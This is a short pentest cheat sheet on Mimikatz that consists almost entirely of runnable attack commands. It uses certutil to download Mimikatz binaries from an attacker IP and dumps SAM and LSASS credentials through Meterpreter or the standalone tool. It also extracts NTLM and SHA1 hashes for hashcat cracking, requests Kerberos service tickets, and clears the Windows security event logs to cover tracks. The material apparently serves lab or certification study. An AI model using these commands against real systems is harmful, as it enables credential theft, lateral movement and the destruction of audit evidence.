Win­dows cre­ates and stores cre­den­tials in the Local Secu­ri­ty Author­i­ty Sub­sys­tem Ser­vice LSASS in the mem­o­ry. On the filesys­tem, the sam data­base stores the hashes.

Use Mimikatz

• as stand­alone
  • If you need to copy the files:

    certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimidrv.sys" mimidrv.sys
    certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimikatz.exe" mimikatz.exe
    certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimilib.dll" mimilib.dll

• as Meter­preter mod­ule

  load mimikatz
  mimikatz_command -f samdump::hashes
  mimikatz_command -f sekurlsa::searchPasswords
  mimikatz_command -f sekurlsa::logonPasswords

  ...

• as Pow­er­ShellEm­pire module
• Mul­ti­ple com­mands can be used for non-inter­ac­tive exe­cu­tion.
  mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz.exe "privilege::debug" "lsadump::sam" exit

Usage

Enable debug mode. This usess the SeDe­bug­Priv­i­lege so that we are able to com­mu­ni­cate with oth­er processes.

privilege:debug

Try to ele­vate priv­i­leges to obtain SYSTEM user privileges:

token::elevate

Get con­tents of the SAM database

lsadump::sam

Dump con­tent of the LSASS.

sekurlsa::logonpasswords

• Tip: Use the fol­low­ing bash line to extract the pass­words to get a file for hash­cat:

  cat securlsa_logonpasswords.txt | grep NTLM | cut -d" " -f9 | uniq
  cat securlsa_logonpasswords.txt | grep SHA1 | cut -d" " -f9 | uniq

Get (Ker­beros) tickets:

1. Con­nect to a sys­tem via Ker­beros. For exam­ple, try to list a share:
   PS> dir \\host.dom.ain\backup
2. Now, list the tick­ets:
   sekurlsa::tickets

Kerberos

Ask for a TGS tick­et from a service.

Requires:

• User account
• Ser­vi­ceprin­ci­pal­name of a service

kerberos::ask /target:HTTP/svMSSQL.svcorp.com

Various

Delete event logs

Clear all (!) secu­ri­ty event logs

privilege::debug
event::drop
event::clear

Ressources

• Huge ref­er­ence